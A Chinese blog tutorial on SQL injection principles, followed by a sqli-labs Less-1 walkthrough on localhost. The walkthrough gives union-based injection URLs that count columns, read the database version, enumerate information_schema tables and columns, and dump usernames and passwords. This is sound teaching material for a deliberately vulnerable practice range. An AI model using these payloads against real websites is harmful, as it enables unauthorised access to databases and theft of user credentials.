sql注入原理

最新推荐文章于 2024-07-19 12:37:36 发布
最新推荐文章于 2024-07-19 12:37:36 发布
阅读量89 收藏
点赞数
文章标签: sql 数据库 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lovelhg/article/details/130815654
版权

SQL注入

Web应用工作原理

原理

SQL注入定义

SQL Injection:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。

SQL注入原理

  • 注入的本质:将用户输入的数据拼接到原始代码中,从而使得被注入的数据被当做代码执行

  • SQL注入原理:服务器端未严格校验客户端发送的数据,而导致服务器端SQL语句被恶意修改并成功执行的行为

  • sql注入的核心:将用户的输入拼接到代码中,并被当做sql语句执行

  • 两个关键条件:

    1. 用户可以控制传参
    2. 原本程序要执行的代码,拼接进了用户输入的数据并且成功执行

SQL注入分类

SQL注入分类

SQL注入过程

  1. 判断站点是否为动态
  2. 判断传承值–数据库交互
  3. 判断是否存在SQl注入
    1. 在传参的后面输入一个字符,页面报错或不正常,说明可能存在SQL注入
    2. 数据类型:数字型、字符型
    3. 数字型:逻辑判断 and 1=1 and 1=2
    4. 字符型:猜测后端的闭合符号(包裹变量的符号)
      • 最后的注释【-- 】一般最后的空格会被浏览器去掉,所以一般最后面会构造闭合【-- asdasd】不会被执行

搭建靶场

sqli-labs

SQLi-Labs是一个专业的SQL注入练习平台,适用于GET和POST场景

下载地址

https://github.com/Audi-1/sqli-labs

安装

1、将下载完成的sqli压缩包进行解压,重命名为sqli
2、将sqli文件 放在phpstudy文件夹中的www文件夹下

3、修改sqli文件夹中的sql-connections/db-creds.inc文件
在这里插入图片描述
在这里插入图片描述

4、访问该文件夹 127.0.0.1/sqli

在这里插入图片描述

5、点击setup database for labs

在这里插入图片描述

6、安装成功

在这里插入图片描述

7、开始你的SQL注入之旅

在这里插入图片描述

以Less-1为例简单讲解SQL注入

1、使用http://127.0.0.1/sqli/Less-1/?id=1’发现数据库是字符类型

在这里插入图片描述

2、使用order by 查看字段数http://127.0.0.1/sqli/Less-1/?id=1‘ order by 4 --a

在这里插入图片描述

3、使用http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,3 – a,发现前端页面返回的是2,3字段

在这里插入图片描述

4、使用http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,database(),version() – a,发现当前数据库是security,版本是5.5.53,存在数据库information_schema

在这里插入图片描述

5、http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘security’ – a 查所有表名

在这里插入图片描述

6、http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,group_concat(column_name),3 from informatin_schema.columns where table_schema=’security’ and table_name=’users’ – a查看users表中的字段

在这里插入图片描述

7、http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,group_concat(username),group_concat(password) from security.users – a 查看字段里的内容

在这里插入图片描述

CS@DN@LHG
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php sql注入原理,常见sql注入原理详解!
weixin_39576018的博客
03-27 428
/*数据库配置/$config = ['hostname'=>"localhost", 'port'=>"3306", 'username'=>"root",'password'=>'','db'=>'sql'];/*接收参数/$id = $_GET['id']?$_GET['id']:"";if(empty($id)){echo "article is not de...
SQL注入简介及原理
hibugs
03-13 454
数据库信息泄露网页篡改网站被挂马数据库被恶意操作让别人拿到webshell随意添加系统用户。
PHP的代码注入是什么意思?底层原理是什么?
长风破浪会有时的博客
05-13 342
当应用程序接收到用户提交的数据时,如果没有对数据进行充分的过滤和验证,攻击者就有可能通过构造恶意的输入,在应用程序中注入一些非法的代码。PHP的代码注入(Code Injection)指的是攻击者通过构造恶意的输入,在应用程序中注入一些非法的代码,从而在应用程序中执行攻击者的指令或代码。这种攻击方式通常会利用应用程序的漏洞,例如未对输入数据进行充分的过滤和验证,导致攻击者可以在应用程序中执行任意代码,造成严重的安全风险,如数据库被盗、系统崩溃等。
PHP代码审计系列基础文章(一)之SQL注入漏洞篇
FreeBuf_的博客
11-14 1091
在审计SQL注入的时候,我们首先要找到对应的传参点,更要多关注代码中正常SQL语句的规则和过滤情况,最重要的是要闭合正常的SQL语句来,最终执行我们想要执行的SQL语句。
php如何实现sql注入
weixin_42577243的博客
01-18 396
SQL注入是通过构造恶意的SQL语句,利用程序中的漏洞,直接在数据库中执行。在 PHP 中,可以使用 PDO 或 mysqli 来预处理 SQL 语句来防止 SQL 注入。这样可以避免在查询中直接插入用户输入的数据。 如果使用 PDO ,可以使用 prepare() 和 execute() 方法来预处理 SQL 语句,并将参数绑定到语句中。 如果使用 mysqli ,可以使用 prepare() ...
SQL注入原理
小丁长不胖
05-31 176
sql注入原理 sql注入产生的原因:前端传递数据给服务器带入到数据库进行执行,用户在传递数据的时候 没有进行严格的检查 导致恶意 的sql语句 拼接到原有的语句上 导致sql注入的产生。 漏洞发现 union联合查询 union联合查询 mysql 5.0版本以上存在information_schema数据 并且 有回显 union 连接前后的两个语句一起执行 后面的语句字段数必须和前面的一样; information_schema库里面包含 所有数据库中的结构包括数据库名 表名 字段名 union
SQL注入原理与解决方法代码示例
09-09
1. SQL注入原理: 当用户输入的数据未经验证或过滤直接拼接到SQL查询中时,攻击者可以通过输入特定的字符串来改变查询的逻辑。例如,通常的登录验证查询可能是这样的: ```sql SELECT * FROM users WHERE ...
计算机病毒与防护:SQL注入原理.ppt
06-10
**计算机病毒与防护:SQL注入原理** SQL注入是一种常见的网络安全威胁,主要针对使用SQL(结构化查询语言)的Web应用程序。这种攻击手段是由于应用程序在处理用户输入时没有进行充分的验证和过滤,使得攻击者可以...
Sql注入原理简介_动力节点Java学院整理
09-09
了解SQL注入原理和防范措施是保障Web应用安全的关键。 1. SQL注入的定义: SQL注入是通过将恶意SQL命令嵌入到用户提交的表单数据或URL参数中,使得服务器在处理这些数据时误执行这些命令。例如,当用户在登录界面...
SQL注入原理PHP防注入代码.pdf
03-31
SQL注入基本概念,原理,防注入php代码以及 相关的图片实例,具体可下载查看。
sql注入原理简介
08-26
一、什么是sql注入? 二、sql注入产生原因 三、sql注入原理 四、sql注入共计的简单示例
SQL注入原理以及Spring Boot如何防止SQL注入(含详细示例代码)
12-29
SQL注入是一种严重的安全威胁,它...综上所述,理解SQL注入原理并采取相应的防护措施是确保应用程序安全的关键。Spring Boot通过提供JdbcTemplate和Spring Data JPA等工具,为开发者提供了防止SQL注入的有效手段。
浅谈SQL注入漏洞原理及利用方式
ZL_1618的博客
06-08 408
在数据交互中,前端的数据传入到后台处理时,由于后端没有做严格的判断,导致其传入的恶意“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。漏洞产生于脚本,注入是针对数据库进行。1.参数用户可控:从前端传给后端的参数内容是用户可以控制的。2.参数带入数据库查询:传入的参数拼接到 SQL 语句,且带入数据库查询。通过SQL注入漏洞,可以查询数据、下载数据、写入webshell 、执行系统命令以及绕过登录限制等。联合注入≥报错注入>DNSlog注入>布尔注入>延时注入。
SQL注入原理及思路(绕过)-超详细
weixin_52501704的博客
05-17 2956
(1)user() 返回当前使用数据库的用户,也就是网站配置文件中连接数据库的账号 (2)version() 返回当前数据库的版本 (3)database() 返回当前使用的数据库,只有在use命令选择一个数据库之后,才能查到 (4)group_concat() 把数据库中的某列数据或某几列数据合并为一个字符串 (5)@@datadir 数据库路径 (6)@@version_compile_os 操作系统版本。通过+1、-1、and 1=1、and 1=2、注释符。或者通过报错注入是网页返回报错信息。
第二阶段:PHP代码审计之SQL注入漏洞原理
qq_22132931的博客
11-16 194
第二阶段:PHP代码审计之SQL注入漏洞原理
php sql注入原理,快速了解sql注入基本原理
weixin_34385646的博客
03-27 102
SQL注入基本原理WEB技术发展日新月异,但是徒手拼SQL的传统手艺还是受相当多的开发者亲睐。毕竟相比于再去学习一套复杂的ORM规则,手拼更说方便,直观。通常自己拼SQL的人,应该是有听说过SQL注入很危险,但是总是心想:我的SQL语句这么简单,不可能被注入的。花5分钟看完这个完整的例子,从今往后应该再也不敢有以上侥幸心理了。简单场景有一个WEB界面提供输入商品名称,展示对应价格,生产日期及生产地...
sql注入原理及解决方案
a304096740的博客
02-06 727
sql注入原理 sql注入原理就是用户输入动态的构造了意外sql语句,造成了意外结果,是攻击者有机可乘 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 根据相关技术原理SQL注入可以分为平台层注入和代码层...
PostgreSQL异常:An I/O error occurred while sending to the backend
最新发布
IT后浪的博客
07-19 260
在使用PostgreSQL数据库批量写入数据的时候,遇到了一个问题,异常内容如下:Cause: org.postgresql.util.PSQLException: An I/O error occurred while sending to the backend.
sleep盲注sql注入原理
07-27
这就是SQL注入盲注的基本原理,攻击者通过构造恶意的输入来篡改原有的SQL语句,从而获取数据库中的信息或实现其他非授权操作。为了防止SQL注入攻击,开发者需要对用户输入进行严格的验证和过滤,使用参数化查询或预...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值